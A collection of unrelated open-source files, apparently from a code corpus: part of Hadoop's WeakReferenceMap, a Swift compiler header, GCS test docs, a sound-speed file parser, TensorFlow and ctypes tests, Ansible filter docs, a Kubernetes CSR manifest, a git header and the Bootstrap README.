private final AtomicLong referenceLostCount = new AtomicLong();
/**
* Counter of entries created.
*/
private final AtomicLong entriesCreatedCount = new AtomicLong();
/**
* Log to report loss of a reference during the create phase, which
* is believed to be a cause of HADOOP-18456.
*/
private final LogExactlyOnce referenceLostDuringCreation = new LogExactlyOnce(LOG);
/**
* instantiate.
* @param factory supplier of new instances
* @param referenceLost optional callback on lost references.
*/
public WeakReferenceMap(
Function<? super K, ? extends V> factory,
@Nullable final Consumer<? super K> referenceLost) {
this.factory = requireNonNull(factory);
this.referenceLost = referenceLost;
}
@Override
public String toString() {
return "WeakReferenceMap{" +
"size=" + size() +
", referenceLostCount=" + referenceLostCount +
", entriesCreatedCount=" + entriesCreatedCount +
'}';
}
/**
* Map size.
* @return the current map size.
*/
  public int size() {
    // counts map entries, including those whose referent has been garbage
    // collected but not yet pruned (the class performs no automatic pruning).
    return map.size();
  }
/**
* Clear all entries.
*/
  public void clear() {
    // drop every entry; delegates to ConcurrentHashMap.clear().
    map.clear();
  }
/**
* look up the value, returning the possibly empty weak reference
* to a value, or null if no value was found.
* @param key key to look up
* @return null if there is no entry, a weak reference if found
*/
  public WeakReference<V> lookup(K key) {
    // raw map access: the returned reference, if non-null, may already have
    // been cleared by the garbage collector.
    return map.get(key);
  }
/**
* Get the value, creating if needed.
* @param key key.
* @return an instance.
*/
public V get(K key) {
final WeakReference<V> currentWeakRef = lookup(key);
// resolve it, after which if not null, we have a strong reference
V strongVal = resolve(currentWeakRef);
if (strongVal != null) {
// all good.
return strongVal;
}
// here, either currentWeakRef was null, or its reference was GC'd.
if (currentWeakRef != null) {
// garbage collection removed the reference.
// explicitly remove the weak ref from the map if it has not
// been updated by this point
// this is here just for completeness.
map.remove(key, currentWeakRef);
// log/report the loss.
noteLost(key);
}
// create a new value and add it to the map
return create(key);
}
/**
* Create a new instance under a key.
* <p>
* The instance is created, added to the map and then the
* map value retrieved.
* This ensures that the reference returned is that in the map,
* even if there is more than one entry being created at the same time.
* If that race does occur, it will be logged the first time it happens
* for this specific map instance.
* <p>
* HADOOP-18456 highlighted the risk of a concurrent GC resulting a null
* value being retrieved and so returned.
* To prevent this:
* <ol>
* <li>A strong reference is retained to the newly created instance
* in a local variable.</li>
* <li>That variable is used after the resolution process, to ensure
* the JVM doesn't consider it "unreachable" and so eligible for GC.</li>
* <li>A check is made for the resolved reference being null, and if so,
* the put() is repeated</li>
* </ol>
* @param key key
* @return the created value
*/
public V create(K key) {
entriesCreatedCount.incrementAndGet();
/*
Get a strong ref so even if a GC happens in this method the reference is not lost.
It is NOT enough to have a reference in a field, it MUST be used
so as to ensure the reference isn't optimized away prematurely.
"A reachable object is any object that can be accessed in any potential continuing
computation from any live thread."
*/
final V strongRef = requireNonNull(factory.apply(key),
"factory returned a null instance");
V resolvedStrongRef;
do {
WeakReference<V> newWeakRef = new WeakReference<>(strongRef);
// put it in the map
map.put(key, newWeakRef);
// get it back from the map
WeakReference<V> retrievedWeakRef = map.get(key);
// resolve that reference, handling the situation where somehow it was removed from the map
// between the put() and the get()
resolvedStrongRef = resolve(retrievedWeakRef);
if (resolvedStrongRef == null) {
referenceLostDuringCreation.warn("reference to %s lost during creation", key);
noteLost(key);
}
} while (resolvedStrongRef == null);
// note if there was any change in the reference.
// as this forces strongRef to be kept in scope
if (strongRef != resolvedStrongRef) {
LOG.debug("Created instance for key {}: {} overwritten by {}",
key, strongRef, resolvedStrongRef);
}
return resolvedStrongRef;
}
/**
* Put a value under the key.
* A null value can be put, though on a get() call
* a new entry is generated
*
* @param key key
* @param value value
* @return any old non-null reference.
*/
public V put(K key, V value) {
return resolve(map.put(key, new WeakReference<>(value)));
}
/**
* Remove any value under the key.
* @param key key
* @return any old non-null reference.
*/
public V remove(K key) {
return resolve(map.remove(key));
}
/**
* Does the map have a valid reference for this object?
* no-side effects: there's no attempt to notify or cleanup
* if the reference is null.
* @param key key to look up
* @return true if there is a valid reference.
*/
public boolean containsKey(K key) {
final WeakReference<V> current = lookup(key);
return resolve(current) != null;
}
/**
* Given a possibly null weak reference, resolve
* its value.
* @param r reference to resolve
* @return the value or null
*/
protected V resolve(WeakReference<V> r) {
return r == null ? null : r.get();
}
/**
* Prune all null weak references, calling the referenceLost
* callback for each one.
*
* non-atomic and non-blocking.
* @return the number of entries pruned.
*/
public int prune() {
int count = 0;
final Iterator<Map.Entry<K, WeakReference<V>>> it = map.entrySet().iterator();
while (it.hasNext()) {
final Map.Entry<K, WeakReference<V>> next = it.next();
if (next.getValue().get() == null) {
it.remove();
count++;
noteLost(next.getKey());
}
}
return count;
}
/**
* Notify the reference lost callback.
* @param key key of lost reference
*/
private void noteLost(final K key) {
// increment local counter
referenceLostCount.incrementAndGet();
// and call any notification function supplied in the constructor
if (referenceLost != null) {
referenceLost.accept(key);
}
}
/**
* Get count of references lost as detected
* during prune() or get() calls.
* @return count of references lost
*/
public final long getReferenceLostCount() {
return referenceLostCount.get();
}
/**
* Get count of entries created on demand.
* @return count of entries created
*/
public final long getEntriesCreatedCount() {
return entriesCreatedCount.get();
}
} | java | github | https://github.com/apache/hadoop | hadoop-common-project/hadoop-common/src/main/java/org/apache/hadoop/util/WeakReferenceMap.java |
//===--- NecessaryBindings.h - Optimizing archetype bindings ----*- C++ -*-===//
//
// This source file is part of the Swift.org open source project
//
// Copyright (c) 2014 - 2017 Apple Inc. and the Swift project authors
// Licensed under Apache License v2.0 with Runtime Library Exception
//
// See https://swift.org/LICENSE.txt for license information
// See https://swift.org/CONTRIBUTORS.txt for the list of Swift project authors
//
//===----------------------------------------------------------------------===//
//
// This file defines a utility class for saving and restoring the
// archetype metadata necessary in order to carry out value operations
// on a type.
//
// This is a supplemental API of GenProto.
//
//===----------------------------------------------------------------------===//
#ifndef SWIFT_IRGEN_NECESSARYBINDINGS_H
#define SWIFT_IRGEN_NECESSARYBINDINGS_H
#include "GenericRequirement.h"
#include "llvm/ADT/SetVector.h"
#include "swift/AST/Types.h"
namespace swift {
class CanType;
enum class MetadataState : size_t;
class ProtocolDecl;
class ProtocolConformanceRef;
class SpecializedProtocolConformance;
namespace irgen {
class Address;
class Explosion;
class IRGenFunction;
class IRGenModule;
class Size;
/// NecessaryBindings - The set of metadata that must be saved in
/// order to perform some set of operations on a type.
class NecessaryBindings {
llvm::SetVector<GenericRequirement> RequirementsSet;
SubstitutionMap SubMap;
bool NoEscape;
public:
NecessaryBindings() {}
NecessaryBindings(SubstitutionMap subs, bool noEscape)
: SubMap(subs), NoEscape(noEscape) {}
SubstitutionMap getSubstitutionMap() const {
return SubMap;
}
/// Collect the necessary bindings to invoke a function with the given
/// signature.
static NecessaryBindings forPartialApplyForwarder(IRGenModule &IGM,
CanSILFunctionType origType,
SubstitutionMap subs,
bool noEscape,
bool considerParameterSources);
/// Collect the necessary bindings to be able to destroy a value inside of a
/// fixed-layout boxed allocation.
static NecessaryBindings forFixedBox(IRGenModule &IGM,
SILBoxType *box);
void addRequirement(GenericRequirement requirement) {
auto type = requirement.getTypeParameter().subst(SubMap);
if (!type->hasArchetype())
return;
RequirementsSet.insert(requirement);
}
/// Get the requirement from the bindings at index i.
const GenericRequirement &operator[](size_t i) const {
return RequirementsSet[i];
}
size_t size() const { return getRequirements().size(); }
/// Is the work to do trivial?
bool empty() const { return getRequirements().empty(); }
/// Returns the required size of the bindings.
/// Pointer alignment is sufficient.
Size getBufferSize(IRGenModule &IGM) const;
/// Save the necessary bindings to the given buffer.
///
/// If `replacementSubs` has a value, then the bindings saved are taken from
/// the given substitution map instead of the substitutions
void save(IRGenFunction &IGF, Address buffer,
std::optional<SubstitutionMap> replacementSubs = std::nullopt)
const;
/// Restore the necessary bindings from the given buffer.
void restore(IRGenFunction &IGF, Address buffer, MetadataState state) const;
const llvm::ArrayRef<GenericRequirement> getRequirements() const {
return RequirementsSet.getArrayRef();
}
private:
void computeBindings(IRGenModule &IGM,
CanSILFunctionType origType,
bool considerParameterSources);
};
} // end namespace irgen
} // end namespace swift
#endif | c | github | https://github.com/apple/swift | lib/IRGen/NecessaryBindings.h |
<!---
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License. See accompanying LICENSE file.
-->
# Testing the GCS filesystem client and its features
<!-- MACRO{toc|fromDepth=0|toDepth=3} -->
This module includes both unit tests, which can run in isolation without
connecting to the GCS service, and integration tests, which require a working
connection to GCS to interact with a bucket. Unit test suites follow the naming
convention `Test*.java`. Integration tests follow the naming convention
`ITest*.java`.
## <a name="setting-up"></a> Setting up the tests
To integration test the GCS filesystem client, you need to provide
`auth-keys.xml` which passes in authentication details to the test runner.
It is a Hadoop XML configuration file, which must be placed into
`hadoop-tools/hadoop-gcp/src/test/resources`.
### File `core-site.xml`
This file pre-exists and sources the configurations created
under `auth-keys.xml`.
For most purposes you will not need to edit this file unless you
need to apply a specific, non-default property change during the tests.
### File `auth-keys.xml`
The presence of this file triggers the testing of the GCS classes.
Without this file, *none of the integration tests in this module will be
executed*.
* `fs.contract.test.fs.gs` : the URL of the bucket for GCS filesystem contract tests
Example:
```xml
<configuration>
<property>
<name>fs.gs.auth.type</name>
<value>SERVICE_ACCOUNT_JSON_KEYFILE</value>
</property>
<property>
<name>fs.gs.auth.service.account.json.keyfile</name>
<value>YOUR_JSON_KEY_FILE</value>
</property>
<property>
<name>fs.gs.project.id</name>
<value>YOUR_PROJECT_ID_HERE</value>
</property>
<property>
<name>fs.contract.test.fs.gs</name>
<value>gs://your_bucket</value>
</property>
</configuration>
```
## <a name="running"></a> Running the Tests
After completing the configuration, execute the test run through Maven.
```bash
mvn clean verify
``` | unknown | github | https://github.com/apache/hadoop | hadoop-cloud-storage-project/hadoop-gcp/src/site/markdown/tools/hadoop-gcp/testing.md |
from __future__ import absolute_import, division, print_function, unicode_literals
import datetime as dt
import numpy as np
import logging
log = logging.getLogger(__name__)
from .base_format import BaseFormat, FormatError
from .. import __version__
from ..ssp_dicts import Dicts
class Unb(BaseFormat):
def __init__(self, file_content):
super(Unb, self).__init__(file_content)
self.name = "UNB"
self.driver = self.name + (".%s" % __version__)
self.version = ""
log.info("reading ...")
lines = self.file_content.splitlines()
self._read_header(lines)
self._read_body(lines)
def _read_header(self, lines):
log.info("reading > header")
try:
self.version = int(lines[0].split()[0])
log.info("version: %s" % self.version)
except ValueError:
log.error("unable to parse the version: %s" % lines[0])
try:
year = int(lines[1].split()[0])
jday = int(lines[1].split()[1])
time = lines[1].split()[2]
hour, minute, second = [int(i) for i in time.split(':')]
utc_time = dt.datetime(year, 1, 1, hour, minute, second) + dt.timedelta(days=jday-1)
self.dg_time = utc_time
log.info("time: %s" % self.dg_time)
except ValueError:
log.error("unable to parse the time: %s" % lines[1])
try:
latitude = float(lines[3].split()[0])
longitude = float(lines[3].split()[1])
self.latitude = latitude
self.longitude = longitude
log.info("position: %s %s" % (self.latitude, self.longitude))
except ValueError:
log.error("unable to parse the position: %s" % lines[3])
try:
num_samples = int(lines[5].split()[0])
self.num_samples = num_samples
log.info("total samples: %s" % self.num_samples)
except ValueError:
log.error("unable to parse the number of samples: %s" % lines[5])
# Faking an XBT for now to help make examples of how CTDs can augment XBTs with salinity
self.sensor_type = Dicts.sensor_types['XBT']
log.info("sensor type: %s" % self.sensor_type)
self.probe_type = Dicts.probe_types['XBT']
log.info("probe type: %s" % self.probe_type)
self.depth = np.zeros(self.num_samples)
self.speed = np.zeros(self.num_samples)
self.temperature = np.zeros(self.num_samples)
self.salinity = np.zeros(self.num_samples)
self.flag = np.zeros(self.num_samples)
def _read_body(self, lines):
log.info("reading > body")
count = 0
for line in lines[16:len(lines)]:
try:
# In case an incomplete file comes through
data = line.split()
self.depth[count] = float(data[1])
self.speed[count] = float(data[2])
if self.version == 2:
# Only version 2 and higher holds T/S and flags
self.temperature[count] = float(data[3])
self.salinity[count] = float(data[4])
# The fifth field is an extra field
self.flag[count] = float(data[6])
except ValueError:
log.error("failure in reading sample %s" % count)
break
count += 1
if self.num_samples != count:
self.depth.resize(count)
self.speed.resize(count)
self.temperature.resize(count)
self.salinity.resize(count)
self.flag.resize(count)
self.num_samples = count | unknown | codeparrot/codeparrot-clean | ||
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for bucketize_op."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import errors_impl
from tensorflow.python.ops import math_ops
from tensorflow.python.platform import test
class BucketizationOpTest(test.TestCase):
def testInt(self):
op = math_ops._bucketize(
constant_op.constant([-5, 0, 2, 3, 5, 8, 10, 11, 12]),
boundaries=[0, 3, 8, 11])
expected_out = [0, 1, 1, 2, 2, 3, 3, 4, 4]
with self.test_session() as sess:
self.assertAllEqual(expected_out, sess.run(op))
def testFloat(self):
op = math_ops._bucketize(
constant_op.constant([-5., 0., 2., 3., 5., 8., 10., 11., 12.]),
boundaries=[0., 3., 8., 11.])
expected_out = [0, 1, 1, 2, 2, 3, 3, 4, 4]
with self.test_session() as sess:
self.assertAllEqual(expected_out, sess.run(op))
def test2DInput(self):
op = math_ops._bucketize(
constant_op.constant([[-5, 0, 2, 3, 5], [8, 10, 11, 12, 0]]),
boundaries=[0, 3, 8, 11])
expected_out = [[0, 1, 1, 2, 2], [3, 3, 4, 4, 1]]
with self.test_session() as sess:
self.assertAllEqual(expected_out, sess.run(op))
def testInvalidBoundariesOrder(self):
op = math_ops._bucketize(
constant_op.constant([-5, 0]), boundaries=[0, 8, 3, 11])
with self.test_session() as sess:
with self.assertRaisesRegexp(
errors_impl.InvalidArgumentError, "Expected sorted boundaries"):
sess.run(op)
def testBoundariesNotList(self):
with self.assertRaisesRegexp(
TypeError, "Expected list for attr boundaries"):
math_ops._bucketize(constant_op.constant([-5, 0]), boundaries=0)
if __name__ == "__main__":
test.main() | unknown | codeparrot/codeparrot-clean | ||
DOCUMENTATION:
name: dirname
author: ansible core team
version_added: "historical"
short_description: get a path's directory name
description:
- Returns the 'head' component of a path, basically everything that is not the 'basename'.
notes:
- The result of this filter is different from the Unix dirname program; where dirname for C(/foo/bar/) returns C(/foo), the dirname filter returns the full path (C(/foo/bar/)).
options:
_input:
description: A path.
type: path
required: true
seealso:
- plugin: ansible.builtin.basename
plugin_type: filter
EXAMPLES: |
# To get the dir name of a file path, like '/etc/asdf' out of '/etc/asdf/foo.txt'.
{{ mypath | dirname }}
RETURN:
_value:
description: The directory portion of the original path.
type: path | unknown | github | https://github.com/ansible/ansible | lib/ansible/plugins/filter/dirname.yml |
import unittest, sys
class SimpleTypesTestCase(unittest.TestCase):
def setUp(self):
import ctypes
try:
from _ctypes import set_conversion_mode
except ImportError:
pass
else:
self.prev_conv_mode = set_conversion_mode("ascii", "strict")
def tearDown(self):
try:
from _ctypes import set_conversion_mode
except ImportError:
pass
else:
set_conversion_mode(*self.prev_conv_mode)
def test_subclasses(self):
from ctypes import c_void_p, c_char_p
# ctypes 0.9.5 and before did overwrite from_param in SimpleType_new
class CVOIDP(c_void_p):
def from_param(cls, value):
return value * 2
from_param = classmethod(from_param)
class CCHARP(c_char_p):
def from_param(cls, value):
return value * 4
from_param = classmethod(from_param)
self.assertEqual(CVOIDP.from_param("abc"), "abcabc")
self.assertEqual(CCHARP.from_param("abc"), "abcabcabcabc")
try:
from ctypes import c_wchar_p
except ImportError:
return
class CWCHARP(c_wchar_p):
def from_param(cls, value):
return value * 3
from_param = classmethod(from_param)
self.assertEqual(CWCHARP.from_param("abc"), "abcabcabc")
# XXX Replace by c_char_p tests
def test_cstrings(self):
from ctypes import c_char_p, byref
# c_char_p.from_param on a Python String packs the string
# into a cparam object
s = "123"
self.assertTrue(c_char_p.from_param(s)._obj is s)
# new in 0.9.1: convert (encode) unicode to ascii
self.assertEqual(c_char_p.from_param(u"123")._obj, "123")
self.assertRaises(UnicodeEncodeError, c_char_p.from_param, u"123\377")
self.assertRaises(TypeError, c_char_p.from_param, 42)
# calling c_char_p.from_param with a c_char_p instance
# returns the argument itself:
a = c_char_p("123")
self.assertTrue(c_char_p.from_param(a) is a)
def test_cw_strings(self):
from ctypes import byref
try:
from ctypes import c_wchar_p
except ImportError:
## print "(No c_wchar_p)"
return
s = u"123"
if sys.platform == "win32":
self.assertTrue(c_wchar_p.from_param(s)._obj is s)
self.assertRaises(TypeError, c_wchar_p.from_param, 42)
# new in 0.9.1: convert (decode) ascii to unicode
self.assertEqual(c_wchar_p.from_param("123")._obj, u"123")
self.assertRaises(UnicodeDecodeError, c_wchar_p.from_param, "123\377")
pa = c_wchar_p.from_param(c_wchar_p(u"123"))
self.assertEqual(type(pa), c_wchar_p)
def test_int_pointers(self):
from ctypes import c_short, c_uint, c_int, c_long, POINTER, pointer
LPINT = POINTER(c_int)
## p = pointer(c_int(42))
## x = LPINT.from_param(p)
x = LPINT.from_param(pointer(c_int(42)))
self.assertEqual(x.contents.value, 42)
self.assertEqual(LPINT(c_int(42)).contents.value, 42)
self.assertEqual(LPINT.from_param(None), None)
if c_int != c_long:
self.assertRaises(TypeError, LPINT.from_param, pointer(c_long(42)))
self.assertRaises(TypeError, LPINT.from_param, pointer(c_uint(42)))
self.assertRaises(TypeError, LPINT.from_param, pointer(c_short(42)))
def test_byref_pointer(self):
# The from_param class method of POINTER(typ) classes accepts what is
# returned by byref(obj), it type(obj) == typ
from ctypes import c_short, c_uint, c_int, c_long, pointer, POINTER, byref
LPINT = POINTER(c_int)
LPINT.from_param(byref(c_int(42)))
self.assertRaises(TypeError, LPINT.from_param, byref(c_short(22)))
if c_int != c_long:
self.assertRaises(TypeError, LPINT.from_param, byref(c_long(22)))
self.assertRaises(TypeError, LPINT.from_param, byref(c_uint(22)))
def test_byref_pointerpointer(self):
# See above
from ctypes import c_short, c_uint, c_int, c_long, pointer, POINTER, byref
LPLPINT = POINTER(POINTER(c_int))
LPLPINT.from_param(byref(pointer(c_int(42))))
self.assertRaises(TypeError, LPLPINT.from_param, byref(pointer(c_short(22))))
if c_int != c_long:
self.assertRaises(TypeError, LPLPINT.from_param, byref(pointer(c_long(22))))
self.assertRaises(TypeError, LPLPINT.from_param, byref(pointer(c_uint(22))))
def test_array_pointers(self):
from ctypes import c_short, c_uint, c_int, c_long, POINTER
INTARRAY = c_int * 3
ia = INTARRAY()
self.assertEqual(len(ia), 3)
self.assertEqual([ia[i] for i in range(3)], [0, 0, 0])
# Pointers are only compatible with arrays containing items of
# the same type!
LPINT = POINTER(c_int)
LPINT.from_param((c_int*3)())
self.assertRaises(TypeError, LPINT.from_param, c_short*3)
self.assertRaises(TypeError, LPINT.from_param, c_long*3)
self.assertRaises(TypeError, LPINT.from_param, c_uint*3)
## def test_performance(self):
## check_perf()
def test_noctypes_argtype(self):
import _ctypes_test
from ctypes import CDLL, c_void_p, ArgumentError
func = CDLL(_ctypes_test.__file__)._testfunc_p_p
func.restype = c_void_p
# TypeError: has no from_param method
self.assertRaises(TypeError, setattr, func, "argtypes", (object,))
class Adapter(object):
def from_param(cls, obj):
return None
func.argtypes = (Adapter(),)
self.assertEqual(func(None), None)
self.assertEqual(func(object()), None)
class Adapter(object):
def from_param(cls, obj):
return obj
func.argtypes = (Adapter(),)
# don't know how to convert parameter 1
self.assertRaises(ArgumentError, func, object())
self.assertEqual(func(c_void_p(42)), 42)
class Adapter(object):
def from_param(cls, obj):
raise ValueError(obj)
func.argtypes = (Adapter(),)
# ArgumentError: argument 1: ValueError: 99
self.assertRaises(ArgumentError, func, 99)
################################################################
if __name__ == '__main__':
unittest.main() | unknown | codeparrot/codeparrot-clean | ||
apiVersion: certificates.k8s.io/v1
kind: CertificateSigningRequest
metadata:
name: foo
spec:
request: LS0tLS1CRUdJTiBDRVJUSUZJQ0FURSBSRVFVRVNULS0tLS0KTUlJQ2d6Q0NBV3NDQVFBd0ZURVRNQkVHQTFVRUF4TUthM1ZpWlMxaFpHMXBiakNDQVNJd0RRWUpLb1pJaHZjTgpBUUVCQlFBRGdnRVBBRENDQVFvQ2dnRUJBTlJ5dFhkcWV6ZTFBdXFjZkpWYlFBY1BJejZWY2pXSTZ5WmlQa3lrCjAzUW9GaHJGRXhUQXNPTGVFUHlrQXc1YndUOWZiajRXMzZmR2k4RGxsd1FzVGoyYzVUTnBnQkkwbElDbzI4aGcKbHYvTDJsMnRsWUVKdDdTbVhjblNvaGJ5S0h4TERRUHVmTVBBTkZsaEFmTUdCWEhRcmZMajhrTk1MUDA4UlBsbAp0N3V4RDVRdFA0cHlGL1Nhbm1XVEtRNU56WlJ4TC82UmhJMEpxSHJmNFFjQmg2dlR5bnFaRGVmMWVxNjBnQXllClNPRkpKYWRuK3h2VEFqLzgxZk1TbjdOSlNnaktDYkNEeXQ1eS9UZHd0SzZnVUQzM01paE5uNXhKTVF0MUZXUVAKRzY3eTA1QVh6b0pqTm5sWVA1MnJsTlhvNzh6aVMrN1E4RklxQzY0c05vWWhxeGNDQXdFQUFhQXBNQ2NHQ1NxRwpTSWIzRFFFSkRqRWFNQmd3Q1FZRFZSMFRCQUl3QURBTEJnTlZIUThFQkFNQ0JlQXdEUVlKS29aSWh2Y05BUUVMCkJRQURnZ0VCQU5CazlwaHpWYUJBci9xZHN4bXdPR1NQa094UkZlR1lyemRvaW5LTzVGUGZER2JkU0VWQ0o1K0wKeWJTNUtmaUZYU1EvNmk0RE9WRWtxcnFrVElIc1JNSlJwbTZ5Zjk1TU4zSWVLak9jQlV2b2VWVlpxMUNOUU8zagp2dklmK1A1NStLdXpvK0NIT1F5RWlvTlRPaUtGWTJseStEZEEwMXMxbU9FMTZSWGlWeFhGcFhGeGRJVmRPK0oxClZ1MW5yWG5ZVFJQRmtyaG80MTlpaDQzNjRPcGZqYXFXVCtmd20ySVZQSlBoaUJpYi9RRzRhUGJJcFh3amlCUUMKemV6WlM2L01nQkt1bUdMZ3Z5MitXNU9UWTJ5ZFFMZFVxbERFNEU2MFhmdVZ6bk5zWjZDS0tYY1pVaW1ZTkkwNgpKa0t4bGRjd0V2cmI0SmN3M2RFQjdOOUwvSW9ZNXFBPQotLS0tLUVORCBDRVJUSUZJQ0FURSBSRVFVRVNULS0tLS0K
signerName: kubernetes.io/kube-apiserver-client
usages:
- digital signature
- key encipherment
- client auth | unknown | github | https://github.com/kubernetes/kubernetes | hack/testdata/csr.yml |
#ifndef LINE_RANGE_H
#define LINE_RANGE_H
struct index_state;
/*
* Parse one item in an -L begin,end option w.r.t. the notional file
* object 'cb_data' consisting of 'lines' lines.
*
* The 'nth_line_cb' callback is used to determine the start of the
* line 'lno' inside the 'cb_data'. The caller is expected to already
* have a suitable map at hand to make this a constant-time lookup.
*
* 'anchor' is the 1-based line at which relative range specifications
* should be anchored. Absolute ranges are unaffected by this value.
*
* Returns 0 in case of success and -1 if there was an error. The
* actual range is stored in *begin and *end. The counting starts
* at 1! In case of error, the caller should show usage message.
*/
typedef const char *(*nth_line_fn_t)(void *data, long lno);
int parse_range_arg(const char *arg,
nth_line_fn_t nth_line_cb,
void *cb_data, long lines, long anchor,
long *begin, long *end,
const char *path, struct index_state *istate);
/*
* Scan past a range argument that could be parsed by
* 'parse_range_arg', to help the caller determine the start of the
* filename in '-L n,m:file' syntax.
*
* Returns a pointer to the first character after the 'n,m' part, or
* NULL in case the argument is obviously malformed.
*/
const char *skip_range_arg(const char *arg, struct index_state *istate);
#endif /* LINE_RANGE_H */ | c | github | https://github.com/git/git | line-range.h |
<p align="center">
<a href="https://getbootstrap.com/">
<img src="https://getbootstrap.com/docs/5.3/assets/brand/bootstrap-logo-shadow.png" alt="Bootstrap logo" width="200" height="165">
</a>
</p>
<h3 align="center">Bootstrap</h3>
<p align="center">
Sleek, intuitive, and powerful front-end framework for faster and easier web development.
<br>
<a href="https://getbootstrap.com/docs/5.3/"><strong>Explore Bootstrap docs »</strong></a>
<br>
<br>
<a href="https://github.com/twbs/bootstrap/issues/new?assignees=-&labels=bug&template=bug_report.yml">Report bug</a>
·
<a href="https://github.com/twbs/bootstrap/issues/new?assignees=&labels=feature&template=feature_request.yml">Request feature</a>
·
<a href="https://blog.getbootstrap.com/">Blog</a>
</p>
## Bootstrap 5
Our default branch is for development of our Bootstrap 5 release. Head to the [`v4-dev` branch](https://github.com/twbs/bootstrap/tree/v4-dev) to view the readme, documentation, and source code for Bootstrap 4.
## Table of contents
- [Quick start](#quick-start)
- [Status](#status)
- [What’s included](#whats-included)
- [Bugs and feature requests](#bugs-and-feature-requests)
- [Documentation](#documentation)
- [Contributing](#contributing)
- [Community](#community)
- [Versioning](#versioning)
- [Creators](#creators)
- [Thanks](#thanks)
- [Copyright and license](#copyright-and-license)
## Quick start
Several quick start options are available:
- [Download the latest release](https://github.com/twbs/bootstrap/archive/v5.3.8.zip)
- Clone the repo: `git clone https://github.com/twbs/bootstrap.git`
- Install with [npm](https://www.npmjs.com/): `npm install bootstrap@v5.3.8`
- Install with [yarn](https://yarnpkg.com/): `yarn add bootstrap@v5.3.8`
- Install with [Bun](https://bun.sh/): `bun add bootstrap@v5.3.8`
- Install with [Composer](https://getcomposer.org/): `composer require twbs/bootstrap:5.3.8`
- Install with [NuGet](https://www.nuget.org/): CSS: `Install-Package bootstrap` Sass: `Install-Package bootstrap.sass`
Read the [Getting started page](https://getbootstrap.com/docs/5.3/getting-started/introduction/) for information on the framework contents, templates, examples, and more.
## Status
[](https://github.com/twbs/bootstrap/actions/workflows/js.yml?query=workflow%3AJS+branch%3Amain)
[](https://www.npmjs.com/package/bootstrap)
[](https://rubygems.org/gems/bootstrap)
[](https://atmospherejs.com/twbs/bootstrap)
[](https://packagist.org/packages/twbs/bootstrap)
[](https://www.nuget.org/packages/bootstrap/absoluteLatest)
[](https://coveralls.io/github/twbs/bootstrap?branch=main)
[](https://github.com/twbs/bootstrap/blob/main/dist/css/bootstrap.min.css)
[](https://github.com/twbs/bootstrap/blob/main/dist/css/bootstrap.min.css)
[](https://github.com/twbs/bootstrap/blob/main/dist/js/bootstrap.min.js)
[](https://github.com/twbs/bootstrap/blob/main/dist/js/bootstrap.min.js)

[](#backers)
[](#sponsors)
## What’s included
Within the download you’ll find the following directories and files, logically grouping common assets and providing both compiled and minified variations.
<details>
<summary>Download contents</summary>
```text
bootstrap/
├── css/
│ ├── bootstrap-grid.css
│ ├── bootstrap-grid.css.map
│ ├── bootstrap-grid.min.css
│ ├── bootstrap-grid.min.css.map
│ ├── bootstrap-grid.rtl.css
│ ├── bootstrap-grid.rtl.css.map
│ ├── bootstrap-grid.rtl.min.css
│ ├── bootstrap-grid.rtl.min.css.map
│ ├── bootstrap-reboot.css
│ ├── bootstrap-reboot.css.map
│ ├── bootstrap-reboot.min.css
│ ├── bootstrap-reboot.min.css.map
│ ├── bootstrap-reboot.rtl.css
│ ├── bootstrap-reboot.rtl.css.map
│ ├── bootstrap-reboot.rtl.min.css
│ ├── bootstrap-reboot.rtl.min.css.map
│ ├── bootstrap-utilities.css
│ ├── bootstrap-utilities.css.map
│ ├── bootstrap-utilities.min.css
│ ├── bootstrap-utilities.min.css.map
│ ├── bootstrap-utilities.rtl.css
│ ├── bootstrap-utilities.rtl.css.map
│ ├── bootstrap-utilities.rtl.min.css
│ ├── bootstrap-utilities.rtl.min.css.map
│ ├── bootstrap.css
│ ├── bootstrap.css.map
│ ├── bootstrap.min.css
│ ├── bootstrap.min.css.map
│ ├── bootstrap.rtl.css
│ ├── bootstrap.rtl.css.map
│ ├── bootstrap.rtl.min.css
│ └── bootstrap.rtl.min.css.map
└── js/
├── bootstrap.bundle.js
├── bootstrap.bundle.js.map
├── bootstrap.bundle.min.js
├── bootstrap.bundle.min.js.map
├── bootstrap.esm.js
├── bootstrap.esm.js.map
├── bootstrap.esm.min.js
├── bootstrap.esm.min.js.map
├── bootstrap.js
├── bootstrap.js.map
├── bootstrap.min.js
└── bootstrap.min.js.map
```
</details>
We provide compiled CSS and JS (`bootstrap.*`), as well as compiled and minified CSS and JS (`bootstrap.min.*`). [Source maps](https://web.dev/articles/source-maps) (`bootstrap.*.map`) are available for use with certain browsers’ developer tools. Bundled JS files (`bootstrap.bundle.js` and minified `bootstrap.bundle.min.js`) include [Popper](https://popper.js.org/docs/v2/).
## Bugs and feature requests
Have a bug or a feature request? Please first read the [issue guidelines](https://github.com/twbs/bootstrap/blob/main/.github/CONTRIBUTING.md#using-the-issue-tracker) and search for existing and closed issues. If your problem or idea is not addressed yet, [please open a new issue](https://github.com/twbs/bootstrap/issues/new/choose).
## Documentation
Bootstrap’s documentation, included in this repo in the root directory, is built with [Astro](https://astro.build/) and publicly hosted on GitHub Pages at <https://getbootstrap.com/>. The docs may also be run locally.
Documentation search is powered by [Algolia's DocSearch](https://docsearch.algolia.com/).
### Running documentation locally
1. Run `npm install` to install the Node.js dependencies, including Astro (the site builder).
2. Run `npm run test` (or a specific npm script) to rebuild distributed CSS and JavaScript files, as well as our docs assets.
3. From the root `/bootstrap` directory, run `npm run docs-serve` in the command line.
4. Open <http://localhost:9001> in your browser, and voilà.
Learn more about using Astro by reading its [documentation](https://docs.astro.build/en/getting-started/).
### Documentation for previous releases
